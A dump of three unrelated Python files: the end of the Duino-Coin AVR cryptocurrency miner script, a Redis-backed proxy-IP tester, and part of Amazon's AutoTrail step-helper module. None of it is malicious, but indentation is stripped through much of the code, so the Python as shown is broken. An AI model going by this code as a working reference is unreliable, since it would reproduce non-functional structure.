avrport = avrport.replace(" ", "").split(',')
donation_level = int(config["AVR Miner"]['donate'])
debug = config["AVR Miner"]['debug']
rig_identifier = config["AVR Miner"]['identifier']
Settings.SOC_TIMEOUT = int(config["AVR Miner"]["soc_timeout"])
Settings.AVR_TIMEOUT = float(config["AVR Miner"]["avr_timeout"])
discord_presence = config["AVR Miner"]["discord_presence"]
shuffle_ports = config["AVR Miner"]["shuffle_ports"]
Settings.REPORT_TIME = int(config["AVR Miner"]["periodic_report"])
hashrate_list = [0] * len(avrport)
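# For reference, the Settings.cfg written by the first-run wizard above looks
# roughly like the sketch below (section and key names match the code above,
# the values are purely illustrative):
#
#   [AVR Miner]
#   username = my_username
#   avrport = COM3,COM4
#   donate = 1
#   language = english
#   identifier = None
#   debug = n
#   soc_timeout = 45
#   avr_timeout = 4
#   discord_presence = y
#   periodic_report = 60
#   shuffle_ports = y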
def greeting():
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string('greeting_morning')
elif current_hour == 12:
greeting = get_string('greeting_noon')
elif current_hour > 12 and current_hour < 18:
greeting = get_string('greeting_afternoon')
elif current_hour >= 18:
greeting = get_string('greeting_evening')
else:
greeting = get_string('greeting_back')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string('banner')
+ Style.RESET_ALL + Fore.MAGENTA
+ f' {Settings.VER}' + Fore.RESET
+ ' 2019-2021')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL + Fore.MAGENTA
+ 'https://github.com/revoxhere/duino-coin')
if lang != "english":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + lang.capitalize()
+ " translation: " + Fore.MAGENTA
+ get_string("translation_autor"))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('avr_on_port')
+ Style.BRIGHT + Fore.YELLOW
+ ' '.join(avrport))
if osname == 'nt' or osname == 'posix':
print(
Style.DIM + Fore.MAGENTA + Settings.BLOCK
+ Style.NORMAL + Fore.RESET
+ get_string('donation_level') + Style.BRIGHT
+ Fore.YELLOW + str(donation_level))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('algorithm')
+ Style.BRIGHT + Fore.YELLOW
+ 'DUCO-S1A ⚙ AVR diff')
if rig_identifier != "None":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('rig_identifier')
+ Style.BRIGHT + Fore.YELLOW + rig_identifier)
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + str(greeting) + ', '
+ Style.BRIGHT + Fore.YELLOW
+ str(username) + '!\n')
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(905158274490441808)
RPC.connect()
Thread(target=update_rich_presence).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate_list), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(shares[0]) + "/"
+ str(shares[0] + shares[1])
+ " accepted shares",
large_image="avrminer",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
#print("Error updating Discord RPC thread: " + str(e))
pass
sleep(15)
def pretty_print(sender: str = "sys0",
msg: str = None,
state: str = "success"):
"""
Produces nicely formatted CLI output for messages:
HH:MM:S |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("avr"):
bg_color = Back.MAGENTA
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ bg_color + Style.BRIGHT + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
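# Example of a resulting console line (colors and styles omitted, illustrative only):
#   21:37:02  sys0  Mining thread starting...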
def share_print(id, type, accept, reject, total_hashrate,
computetime, diff, ping):
"""
Produces nicely formatted CLI output for shares:
HH:MM:S |avrN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
try:
diff = get_prefix("", int(diff), 0)
except:
diff = "?"
try:
total_hashrate = get_prefix("H/s", total_hashrate, 2)
except:
total_hashrate = "? H/s"
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + Back.MAGENTA + Fore.RESET
+ " avr" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.YELLOW
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def mine_avr(com, threadid, fastest_pool):
global hashrate
start_time = time()
report_shares = 0
while True:
while True:
try:
ser.close()
pretty_print('sys' + port_num(com),
f"Closed COM port {com}", 'success')
sleep(2)
except:
pass
try:
ser = Serial(com, baudrate=int(Settings.BAUDRATE),
timeout=float(Settings.AVR_TIMEOUT))
"""
Sleep after opening the port to make
sure the board resets properly after
receiving the DTR signal
"""
sleep(2)
break
except Exception as e:
pretty_print(
'sys'
+ port_num(com),
get_string('board_connection_error')
+ str(com)
+ get_string('board_connection_error2')
+ Style.NORMAL
+ Fore.RESET
+ f' (avr connection err: {e})',
'error')
sleep(10)
retry_counter = 0
while True:
try:
if retry_counter > 3:
fastest_pool = Client.fetch_pool()
retry_counter = 0
debug_output(f'Connecting to {fastest_pool}')
s = Client.connect(fastest_pool)
server_version = Client.recv(s, 6)
if threadid == 0:
if float(server_version) <= float(Settings.VER):
pretty_print(
'net0', get_string('connected')
+ Style.NORMAL + Fore.RESET
+ get_string('connected_server')
+ str(server_version) + ")",
'success')
else:
pretty_print(
'sys0', f' Miner is outdated (v{Settings.VER}) -'
+ get_string('server_is_on_version')
+ server_version + Style.NORMAL
+ Fore.RESET + get_string('update_warning'),
'warning')
sleep(10)
Client.send(s, "MOTD")
motd = Client.recv(s, 1024)
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: " + Fore.RESET
+ Style.NORMAL + str(motd),
"success")
break
except Exception as e:
pretty_print('net0', get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error')
retry_counter += 1
sleep(10)
pretty_print('sys' + port_num(com),
get_string('mining_start') + Style.NORMAL + Fore.RESET
+ get_string('mining_algorithm') + str(com) + ')',
'success')
while True:
try:
debug_output(com + ': Requesting job')
Client.send(s, 'JOB'
+ Settings.SEPARATOR
+ str(username)
+ Settings.SEPARATOR
+ 'AVR')
job = Client.recv(s, 128).split(Settings.SEPARATOR)
debug_output(com + f": Received: {job[0]}")
try:
diff = int(job[2])
except:
pretty_print("sys" + port_num(com),
f" Node message: {job[1]}", "warning")
sleep(3)
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
sleep(3)
break
retry_counter = 0
while True:
if retry_counter > 3:
break
try:
debug_output(com + ': Sending job to the board')
ser.write(bytes(str(job[0]
+ Settings.SEPARATOR
+ job[1]
+ Settings.SEPARATOR
+ job[2]
+ Settings.SEPARATOR),
encoding=Settings.ENCODING))
debug_output(com + ': Reading result from the board')
result = ser.read_until(b'\n').decode().strip().split(',')
ser.flush()
if result[0] and result[1]:
_ = int(result[0], 2)
debug_output(com + f': Result: {result[0]}')
break
else:
raise Exception("No data received from AVR")
except Exception as e:
debug_output(com + f': Retrying data read: {e}')
retry_counter += 1
continue
try:
computetime = round(int(result[1], 2) / 1000000, 3)
num_res = int(result[0], 2)
hashrate_t = round(num_res / computetime, 2)
hashrate_mean.append(hashrate_t)
hashrate = mean(hashrate_mean[-5:])
hashrate_list[threadid] = hashrate
except Exception as e:
pretty_print('sys' + port_num(com),
get_string('mining_avr_connection_error')
+ Style.NORMAL + Fore.RESET
+ ' (no response from the board: '
+ f'{e}, please check the connection, '
+ 'port setting or reset the AVR)', 'warning')
break
try:
Client.send(s, str(num_res)
+ Settings.SEPARATOR
+ str(hashrate_t)
+ Settings.SEPARATOR
+ f'Official AVR Miner {Settings.VER}'
+ Settings.SEPARATOR
+ str(rig_identifier)
+ Settings.SEPARATOR
+ str(result[2]))
                responsetimestart = now()
feedback = Client.recv(s, 64)
responsetimestop = now()
                time_delta = (responsetimestop -
                              responsetimestart).microseconds
ping_mean.append(round(time_delta / 1000))
ping = mean(ping_mean[-10:])
diff = get_prefix("", int(diff), 0)
debug_output(com + f': retrieved feedback: {feedback}')
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
debug_output(com + f': error parsing response: {e}')
sleep(5)
break
if feedback == 'GOOD':
shares[0] += 1
printlock.acquire()
share_print(port_num(com), "accept",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
elif feedback == 'BLOCK':
shares[0] += 1
printlock.acquire()
share_print(port_num(com), "block",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
else:
shares[1] += 1
printlock.acquire()
share_print(port_num(com), "reject",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
title(get_string('duco_avr_miner') + str(Settings.VER)
+ f') - {shares[0]}/{(shares[0] + shares[1])}'
+ get_string('accepted_shares'))
end_time = time()
elapsed_time = end_time - start_time
if threadid == 0 and elapsed_time >= Settings.REPORT_TIME:
report_shares = shares[0] - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time, end_time, report_shares,
hashrate, uptime)
start_time = time()
def periodic_report(start_time, end_time, shares,
hashrate, uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" " + get_string('periodic_mining_report')
+ Fore.RESET + Style.NORMAL
+ get_string('report_period')
+ str(seconds) + get_string('report_time')
+ get_string('report_body1')
+ str(shares) + get_string('report_body2')
+ str(round(shares/seconds, 1))
+ get_string('report_body3') + get_string('report_body4')
+ str(int(hashrate)) + " H/s" + get_string('report_body5')
+ str(int(hashrate*seconds)) + get_string('report_body6')
+ get_string('total_mining_time') + str(uptime), "success")
def calculate_uptime(start_time):
    uptime = time() - start_time
    if uptime <= 59:
        return str(round(uptime)) + get_string('uptime_seconds')
    elif uptime < 120:
        return str(round(uptime // 60)) + get_string('uptime_minute')
    elif uptime < 3600:
        return str(round(uptime // 60)) + get_string('uptime_minutes')
    elif uptime < 7200:
        return str(round(uptime // 3600)) + get_string('uptime_hour')
    else:
        return str(round(uptime // 3600)) + get_string('uptime_hours')
if __name__ == '__main__':
init(autoreset=True)
title(f"{get_string('duco_avr_miner')}{str(Settings.VER)})")
try:
load_config()
debug_output('Config file loaded')
except Exception as e:
pretty_print(
'sys0', get_string('load_config_error')
+ Settings.DATA_DIR + get_string('load_config_error_warning')
+ Style.NORMAL + Fore.RESET + f' ({e})', 'error')
debug_output(f'Error reading configfile: {e}')
sleep(10)
_exit(1)
try:
greeting()
debug_output('Greeting displayed')
except Exception as e:
debug_output(f'Error displaying greeting message: {e}')
if donation_level > 0:
try:
Donate.load(donation_level)
Donate.start(donation_level)
except Exception as e:
debug_output(f'Error launching donation thread: {e}')
try:
fastest_pool = Client.fetch_pool()
threadid = 0
for port in avrport:
Thread(target=mine_avr,
args=(port, threadid,
fastest_pool)).start()
threadid += 1
except Exception as e:
debug_output(f'Error launching AVR thread(s): {e}')
if discord_presence == "y":
try:
init_rich_presence()
except Exception as e:
debug_output(f'Error launching Discord RPC thread: {e}')
|
reTestIP.py
|
import redis
from tools.common import test_http_proxy
import threading
def http_task():
    # Connect to the Redis database
POOL = redis.ConnectionPool(host='127.0.0.1', port=6379)
CONN_REDIS = redis.Redis(connection_pool=POOL)
    # Take one IP out for testing
# proxy = CONN_REDIS.("freeProxy:AfterVerifyOKhttp")
ip = CONN_REDIS.srandmember("freeProxy:AfterVerifyOKhttp",1)
    # Check whether there are any IPs left in Redis
if not ip:
return 0
else:
# print("INFO: Get proxy from Redis freeProxy:BeforeVerifyhttp list")
proxy = str(ip[0], encoding="utf-8")
flag = test_http_proxy(proxy)
if flag == True:
# CONN_REDIS.sadd("freeProxy:AfterVerifyOKhttp", proxy)
# print("INFO: Save this Proxy IP in freeProxy:AfterVerifyOKhttp")
with open("pass.txt", "a+") as f:
f.write(proxy + "/n")
print("Pass:", proxy)
else:
# CONN_REDIS.sadd("freeProxy_Bad:AfterVerifyFailhttp", proxy)
# print("INFO: Abandon this Proxy IP!")
with open("fail.txt", "a+") as f:
f.write(proxy + "+/n")
print("Fail:", proxy)
return 1
def loop_test(name):
print("*Start thread task %s" % name)
while True:
result = http_task()
print("\n")
if result == 0:
break
if __name__ == "__main__":
jobs = []
num = 8
for i in range(1, num+1):
name = "Thread-" + str(i)
jobs.append(threading.Thread(target=loop_test, args=(name,)))
    # Start the threads
for t in jobs:
t.start()
for t in jobs:
t.join()
|
step.py
|
"""Copyright 2017-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with the
License. A copy of the License is located at
http://aws.amazon.com/apache2.0/
or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and
limitations under the License.
Step and action function helpers
This module defines some helpers that make writing action functions and defining steps very easy.
"""
import shlex
import string
from functools import wraps
from multiprocessing import Process
from multiprocessing import Queue as ProcessQueue
from Queue import Empty as QueueEmpty
from subprocess import Popen, PIPE
from time import sleep
from autotrail.core.dag import Step
def create_conditional_step(action_function, **tags):
"""Factory to create a Step that acts like a guard to a branch.
    If this step fails, all subsequent steps in that branch will be skipped.
Consider the following trail where 'b' is the "conditional" step.
+--> d -->+
+--> b -->| |-->+
| +--> e -->+ |
a -->| |--> f
+--> c --------------- >+
    Let's say we want the branch "b" to run only if some condition is matched.
We can consider the step 'b' to be the 'conditional' for this branch, i.e., it should succeed only if the condition
is satisfied. If the condition is not satisfied, it will fail.
Failure of 'b' will have the effect of skipping the progeny i.e., if 'b' fails, steps d and e will be "skipped".
Progeny here is strict i.e., progeny of 'b' are 'd' and 'e' but not 'f' (since 'f' has a parent that is not related
to 'b').
This is done by setting two of the step's attributes:
    Step.pause_on_fail = False -- So that the step fails instead of being moved to Step.PAUSE.
Step.skip_progeny_on_failure = True -- So that the progeny are skipped on failure.
Returns:
Step object whose pause_on_fail is False and skip_progeny_on_failure is True.
"""
step = Step(action_function, **tags)
step.pause_on_fail = False
step.skip_progeny_on_failure = True
return step
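# Minimal usage sketch (the condition function and the tag below are hypothetical;
# only create_conditional_step itself comes from this module):
#
#   def check_maintenance_window(trail_env, context):
#       # Raise to fail the conditional (and skip its progeny); return normally to let the branch run.
#       if not context.in_maintenance_window:
#           raise RuntimeError('Outside the maintenance window; skipping this branch.')
#
#   conditional_step = create_conditional_step(check_maintenance_window, branch='maintenance')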
def _create_arguments_dictionary(parameter_extractors, environment, context):
"""Creates a dictionary of arguments (to pass to an action function) using the parameters and the
parameter_extractor_mapping as a guide and extracts the values from environment and context.
Arguments:
parameter_extractors -- A list of functions used to extract and prepare the parameters.
Each of these functions should:
1. Accept 2 arguments: the TrailEnvironment and context. If there is no context,
None will be passed as an argument.
2. They must return a dictionary whose key is one of the parameters.
The dictionary created from all of the parameter_extractors is then used as kwargs
to the function_or_method. See example usage for more clarity.
environment -- The TrailEnvironment object passed to an action function.
context -- The user-defined context object passed to the action function.
Returns:
A dictionary containing the values retrieved from environment and context using each of the functions from
parameter_extractors.
The dictionary is of the form:
{
'<Parameter>': <Value>,
}
"""
arguments = {}
for parameter_extractor in parameter_extractors:
arguments.update(parameter_extractor(environment, context))
return arguments
def _run_return_handlers(returned, context, return_handlers):
"""Call each function in the return_handlers list by passsing them the returned and context objects.
Arguments:
returned -- The object returned by the function being wrapped using extraction_wrapper.
The type of this object doesn't matter but should be compatible with the behaviour expected by
each of the return_handlers.
context -- The context object.
return_handlers -- A list of return handler functions:
[<Return handler>, ...]
Each of these functions should:
1. Accept 2 arguments: the returned value and the context object.
E.g., lambda retval, context: #code
2. Their return values are not used. However, they can produce side-effects by updating the
context objects.
Each return handler function is called one after the other so that each function can extract one
value from the returned object and update the context object. This allows each of these to be
lambdas in most cases and doesn't require them to be complicated functions.
"""
for return_handler in return_handlers:
return_handler(returned, context)
def extraction_wrapper(function_or_method, parameter_extractors, function=True, return_handlers=None,
return_value_extractor=lambda rval, context: rval,
exception_handlers=None):
"""Action function decorator that replaces the action function with a function that accepts TrailEnvironment and
    Context and extracts the values using the provided parameter_extractors before calling the action function
it decorates.
In reality, this is a function that returns a decorator, which in-turn handles the call to the action function.
Arguments:
function_or_method -- A free-standing function or the method of an object that needs to be wrapped.
Unlike the requirement of a Step, this doesn't have to be the __call__ method but
any method.
function -- Boolean - True represents the object passed as function_or_method is a free-standing
function.
False means the object passed as function_or_method is a method of an object.
Defaults to True. Methods are handled differently because they have a 'self'
argument.
parameter_extractors -- A list of functions used to extract and prepare the parameters for the given
function_or_method.
Each of these functions should:
1. Accept 2 arguments: the TrailEnvironment and context. If there is no context,
None will be passed as an argument.
2. They must return a dictionary whose key is one of the parameters of the given
function_or_method.
The dictionary created from all of the parameter_extractors is then used as kwargs
to the function_or_method. See example usage for more clarity.
return_handlers -- A list of return handler functions:
[<Return handler>, ...]
Each of these functions should:
1. Accept 2 arguments: the returned value and the context object.
E.g., lambda retval, context: #code
2. Their return values are not used. However, they can produce side-effects by
updating the context objects with any method calls.
Each return handler function is called one after the other so that each function
can extract one value from the returned object and update the context object. This
allows each of these to be lambdas in most cases and doesn't require them to be
complicated functions.
return_value_extractor -- A function that accepts returned value and context and returns a value that will be
the final return value of the action function. This return value is returned as a
result of the step running the action function.
Defaults to returning the value returned as-is by using: lambda rval, context: rval
exception_handlers -- A list of tuples containing the exception class and the function that will be called
to handle an exception of that class.
'isinstance' is used to check if the exception class matches and ordering is
respected, so, these need to be ordered in the same "layered" manner as is done in
Python code i.e., a narrow exception hander needs to come before the broader handler
if they are subclassed.
Once a match is found, no subsequent handlers will be checked.
Example form:
[(<Exception class 1>, <Handler function 1>), ...]
The functions associated with the exception class should:
1. Accept 2 arguments: the exception object and the context object.
E.g., lambda e, context: #code
2. Their return values are considered the return value of the step.
                                       If an exception is not found in the list, it goes unhandled and it will bubble up,
causing the step to fail.
Returns:
An action function that can be used to construct a Step.
The returned function accepts 2 parameters: TrailEnvironment and context and therefore can be used to create a Step.
Usage:
def example_usage(value, trail_output, default='No'):
# Do something.
return some_value
step_example_usage = Step(extraction_wrapper(
example_usage,
# The parameter extraction functions eventually produce the following dictionary:
# {
# 'value': context.get_value(),
# 'trail_output': environment.output,
# 'default': 'Yes',
# }
# Which are then passed as kwargs to example_usage having the same effect as:
# example_usage(value=context.get_value(), trail_output=environment.output, default='Yes')
parameter_extractors=[
# The 'value' is obtained by calling context.get_value()
lambda env, context: dict(value=context.get_value()),
# The 'trail_output' object is obtained from the TrailEnvironment object passed by AutoTrail.
lambda env, context: dict(trail_output=env.output),
# Supply the keyword argument value='yes' to example_usage function without using either context or
# TrailEnvironment.
lambda env, context: dict(default='Yes'),
],
        # In fact, the above can be simplified to the following:
# parameter_extractors=[
# lambda env, context: dict(value=context.get_value(), trail_output=env.output, default='Yes'))
# ],
# Here, cleanup_func will be called if SomeException is raised.
exception_handlers=[(SomeException, lambda e, context: cleanup_func(context.resource))],
# The returned value is stored in the context object using the set_value method.
return_handlers=[lambda rval, context: context.set_value(rval)],
# The final return value is the value returned by example_usage but converted to string.
return_value_extractor=lambda rval, context: str(rval)))
    This is helpful when writing action functions while retaining a readable signature.
def example_usage(value, trail_output, default='No')
Is more readable than:
def example_usage(environment, context):
Because in the latter case, it is not immediately clear what values are being used.
"""
if return_handlers is None:
return_handlers = []
if exception_handlers is None:
exception_handlers = []
@wraps(function_or_method)
def args_replacing_func(*args):
if function:
# Case where function_or_method is a free-standing function.
environment, context = args
func_call = function_or_method
else:
# Case where function_or_method is bound to an instance of a class.
# 'self' will be passed by Python, and it needs to be passed to the function_or_method.
self, environment, context = args
func_call = lambda **kwargs: function_or_method(self, **kwargs)
arguments = _create_arguments_dictionary(parameter_extractors, environment, context)
try:
returned = func_call(**arguments)
except Exception as e:
for exception_class, exception_handler in exception_handlers:
if isinstance(e, exception_class):
return exception_handler(e, context)
raise
_run_return_handlers(returned, context, return_handlers)
return return_value_extractor(returned, context)
return args_replacing_func
def accepts_context(func):
"""Allows defining an action function that accepts only a context and doesn't accept the TrailEnvironment.
Example:
@accepts_context
def action_function_taking_only_context(context):
# Do something with context
pass
"""
@wraps(func)
def func_accepts_context(trail_env, context):
return func(context)
return func_accepts_context
def accepts_environment(func):
"""Allows defining an action function that accepts only theTrailEnvironment and doesn't accept a context.
Example:
@accepts_environment
def action_function_taking_only_environment(trail_env):
# Do something with trail_env
pass
"""
@wraps(func)
def func_accepts_environment(trail_env, context):
return func(trail_env)
return func_accepts_environment
def accepts_nothing(func):
"""Allows defining an action function that accepts nothing.
It ignores both TrailEnvironment and context.
Example:
@accepts_nothing
def action_function_takes_nothing():
# Do something
pass
"""
@wraps(func)
def func_accepts_nothing(trail_env, context):
return func()
return func_accepts_nothing
class InstructionNotCompletedError(RuntimeError):
"""A run-time exception raised by the Instruction class to indicate that the instruction sent to the user could not
be completed.
When an instruction is sent to the user as a message, (with reply_needed as True), the user is expected to reply to
the message.
A True value means the instruction was completed by the user.
A False value means the instruction could not be completed for whatever reason.
This is raised when the user returns a False value.
"""
pass
class Instruction(object):
"""Provides the skeleton for a Runbook instruction-like action_function.
The class creates an action function that ensures the given instruction is sent to the user.
Arguments:
name -- This is a string that represents the name of the action function.
instruction_function -- This is a function which will be called with the environment and context objects and
should return the instruction (string) that will be sent to the user or None.
Example:
lambda env, context: 'Run the command: /tmp/command_to_run {}'.format(context.value)
If a string is returned by the instruction_function, the string is sent to the user as
an instruction.
If None is returned by the instruction_function, then no instruction is sent. This is useful
for conditional instructions ie., an instruction should be sent based on some context
attribute's value.
reply_needed -- boolean - Changes behaviour as follows:
If True : The action function returns *only* when the user has responded to the message
(marking it done). The reply message needed by this action function is the boolean
True.
False indicates that the instruction could not be completed and the action
function will be considered failed.
If False: The action function doesn't wait for the user's response.
Raises:
AttributeError -- If the context object does not have an attribute required by the template (if any).
    Example #1:
        # An instruction that needs a reply from the user.
        instruction_step = Step(Instruction('instruction_1', lambda env, context: 'This is instruction #1.'))
    Example #2:
        # An instruction that does not need any reply from the user.
        instruction_step = Step(Instruction(
            'instruction_1', lambda env, context: 'This is instruction #1.', reply_needed=False))
    Example #3:
        # An instruction that uses a templating function
        instruction_step = Step(Instruction(
            'instruction_1', make_simple_templating_function('This is a templated instruction: {value}')))
        # The attribute 'value' will be extracted from context and applied to the above template.
"""
def __init__(self, name, instruction_function, reply_needed=True):
self.name = name
self.instruction_function = instruction_function
self.reply_needed = reply_needed
def __str__(self):
return str(self.name)
def __call__(self, trail_env, context):
"""This method is the one called when AutoTrail runs this action function (an instance of this class).
It accepts TrailEnvironment and context for compliance and makes no use of context.
Arguments:
trail_env -- An object of type TrailEnvironment. (passed by AutoTrail)
context -- A user defined object passed to AutoTrail during runtime. (passed by AutoTrail)
Returns:
String -- Message expressing success.
        Raises InstructionNotCompletedError expressing failure.
"""
message = self.instruction_function(trail_env, context)
if message is None:
return 'No instruction to send.'
if self.reply_needed:
done = trail_env.input(message)
if done is not True:
raise InstructionNotCompletedError('This step could not be completed based on response received.')
else:
return 'Step completed successfully based on response received.'
else:
trail_env.output(message)
return 'Output sent.'
class ShellCommandFailedError(RuntimeError):
"""A run-time exception raised by the ShellCommand class to indicate that the execution of the shell command failed.
When a shell command is run, its failure is identified by:
1. The exit code of the command (as identified by the predicate function provided by the user).
2. The presence of a specific error in STDERR (as identified by the predicate function).
This exception is raised when the command fails due to either of the above reasons.
"""
pass
class ShellCommand(object):
"""Provides the skeleton to run a shell command.
The class creates an action function that runs a shell command and tails its output.
    Any output sent to STDOUT or STDERR by the shell command is then communicated to the user using messages.
Arguments:
name -- This is a string that represents the name of the action function.
command_function -- This is a function which will be called with the environment and context objects and
should return the command (string) that will be run or None.
Example:
lambda env, context: '/tmp/command_to_run --value {}'.format(context.value)
When a string is returned by the command_function, the command is executed.
If None is returned by the command_function, then nothing is executed. This is useful
for conditional execution ie., a command should be run based on some context attribute's
value.
Keyword Arguments:
delay -- This is the delay with which the STDOUT is checked for new output.
Defaults to 1.
is_error_ignorable -- Predicate function that returns True when an error in STDERR can be ignored (not shown to
the user).
Defaults to: Ignore only false values (like blank lines).
Signature of the predicate function:
Return Type: Boolean (True or False)
Arguments : String -- error message sent to STDERR.
is_error_fatal -- Predicate function that returns True when an error is considered FATAL ie., the action
function should FAIL if this error is encountered in STDERR.
Defaults to: Ignore all. This default option ensures that the action function does not
fail due to the presence of messages in STDERR but due to the exit code of the shell
command since it is quite likely that a command might print any warnings to STDERR
without failing.
Signature of the predicate function:
Return Type: Boolean (True or False)
Arguments : String -- error message sent to STDERR.
is_exit_code_ignorable -- Predicate function that returns True when the exit code of the shell command can be
ignored and not treated as failure.
Defaults to: Ignore nothing. Any non-zero exit code will cause the action function to
fail.
Signature of the predicate function:
Return Type: Boolean (True or False)
Arguments : Int -- Exit code of the shell command.
is_output_ignorable -- Predicate function that returns True when a message in STDOUT can be ignored (not shown
to the user). This is useful when the shell command is verbose and not all output needs
to be sent to the user.
Defaults to: Ignore only false values (like blank lines).
Signature of the predicate function:
Return Type: Boolean (True or False)
Arguments : String -- message sent to STDOUT.
Example:
        shell_step = Step(ShellCommand('list_files', lambda env, context: 'ls -l'))
"""
def __init__(self, name, command_function, delay=1,
is_error_ignorable=lambda x: True if not x else False,
is_error_fatal=lambda x: False,
is_exit_code_ignorable=lambda x: x == 0,
is_output_ignorable=lambda x: True if not x else False):
self.name = name
self.command_function = command_function
self.delay = delay
# Predicate functions
self.is_error_ignorable = is_error_ignorable
self.is_error_fatal = is_error_fatal
self.is_exit_code_ignorable = is_exit_code_ignorable
self.is_output_ignorable = is_output_ignorable
def __str__(self):
return str(self.name)
def send_messages(self, trail_env, prefix, messages):
"""Send messages to the user using TrailEnvironment.output.
Prefixes the messages with the provided prefix and formats them as follows:
[<prefix>] -- <message>
Each message from messages is sent in the above format.
Arguments:
trail_env -- An object of type TrailEnvironment.
prefix -- String that will be prefixed before each message.
                        Used when messages need to be distinguished between STDOUT and STDERR.
messages -- List of strings.
"""
for message in messages:
trail_env.output('[{0}] -- {1}'.format(prefix, message))
def get_valid_stdout_messages(self, stdout_messages):
"""Reads messages from self.stdout_queue and filters them.
Uses the is_output_ignorable predicate function to filter out messages in STDOUT.
Pre-condition:
self.is_output_ignorable should refer to the predicate function.
Arguments:
stdout_messages -- List of messages read from STDOUT.
Returns:
List of strings -- List of filtered STDOUT messages.
"""
return [message for message in stdout_messages if not self.is_output_ignorable(message)]
def get_valid_stderr_messages(self, stderr_messages):
"""Reads messages from self.stderr_queue and filters them.
Uses the is_error_ignorable predicate function to filter out messages in STDERR.
Pre-condition:
self.is_error_ignorable should refer to the predicate function.
Arguments:
stderr_messages -- List of messages read from STDERR.
Returns:
List of strings -- List of filtered STDERR messages.
"""
return [message for message in stderr_messages if not self.is_error_ignorable(message)]
def get_latest_fatal_error(self, stderr_messages):
"""Returns the last fatal error encountered in stderr_messages.
Fatal errors are identified using the is_error_fatal predicate function.
This method iterates over stderr_messages and returns the last identified fatal error.
Pre-condition:
self.is_error_fatal should refer to the predicate function.
Arguments:
stderr_messages -- List of strings - messages collected from STDERR.
Returns:
string -- Containing the last encountered fatal error.
None -- If no errors were encountered.
"""
fatal_message = None
for error_message in stderr_messages:
if self.is_error_fatal(error_message):
fatal_message = error_message
return fatal_message
def generate_failure_message(self, command, command_process, fatal_error):
"""Generates a user-friendly message in case of failure of the
shell command.
Arguments:
command -- String - The command to be run.
command_process -- A Popen object that refers to the process running the shell command.
fatal_error -- This is either None or a string containing the last known fatal error.
Returns:
string -- A message of the format:
[Command: <command>] -- Failed with exit code: <exit code> STDERR (Last line): <fatal error>
"""
return '[Command: {command}] -- Failed with exit code: {exit_code}, STDERR (Last line): {error}'.format(
command=command, exit_code=command_process.poll(), error=fatal_error)
def generate_success_message(self, command, command_process):
"""Generates a user-friendly message in case of successs of the shell command.
Arguments:
command -- String - The command to be run.
command_process -- A Popen object that refers to the process running the shell command.
Returns:
string -- A message of the format:
[Command: <command>] -- Succeeded with exit code: <exit code>
"""
return '[Command: {command}] -- Succeeded with exit code: {exit_code}.'.format(
command=command, exit_code=command_process.poll())
def was_run_successful(self, command_process, fatal_error):
